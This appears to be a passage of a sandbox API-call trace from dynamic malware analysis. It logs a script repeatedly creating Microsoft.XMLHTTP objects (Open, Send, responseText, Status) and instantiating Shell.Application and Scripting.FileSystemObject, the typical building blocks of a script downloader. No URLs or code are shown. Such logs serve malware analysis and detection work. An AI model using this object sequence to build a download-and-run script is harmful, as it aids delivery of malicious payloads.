	[0447.798] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0447.798] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0447.798] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.798] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0447.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0447.799] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0447.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0450.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0450.799] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0450.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0450.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0450.799] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0450.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0450.800] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0450.800] SysStringLen (param_1=0x0) returned 0x0
	[0450.800] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0450.800] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0450.800] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0450.800] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0450.800] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0450.800] ??2@YAPEAX_K@Z () returned 0x62f350
	[0450.800] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0450.800] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0450.800] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0450.800] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0450.800] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0450.800] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0450.800] SysStringLen (param_1=0x0) returned 0x0
	[0450.801] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0450.804] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0450.804] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0450.804] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0450.804] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0450.804] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0450.804] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0451.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0451.633] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0451.633] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0451.635] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.635] SysStringLen (param_1=0x0) returned 0x0
	[0451.635] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.635] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0451.635] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0451.635] ??2@YAPEAX_K@Z () returned 0x62f330
	[0451.635] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0451.635] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.635] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0451.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0451.635] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0451.635] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.635] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.638] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.638] SysStringLen (param_1=0x0) returned 0x0
	[0451.638] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.638] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7250) returned 0x0
	[0451.638] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.638] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0451.638] ??2@YAPEAX_K@Z () returned 0x62f310
	[0451.638] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f310) 
	[0451.638] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.639] XMLHTTPRequest:IUnknown:Release (This=0x49c72b8) returned 0x0
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7250) returned 0x0
	[0451.639] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7250) returned 0x3
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.639] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7250, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7250, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.639] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.639] SysStringLen (param_1=0x0) returned 0x0
	[0451.639] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.639] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0451.639] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0451.639] ??2@YAPEAX_K@Z () returned 0x62f330
	[0451.639] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f330) 
	[0451.639] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0451.640] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0451.640] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0451.640] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0451.640] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0451.640] SysStringLen (param_1=0x0) returned 0x0
	[0451.640] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0451.640] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0451.640] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0451.640] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72b8) returned 0x0
	[0451.640] ??2@YAPEAX_K@Z () returned 0x62f310
	[0451.640] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72b8, pUnkSite=0x62f310) 
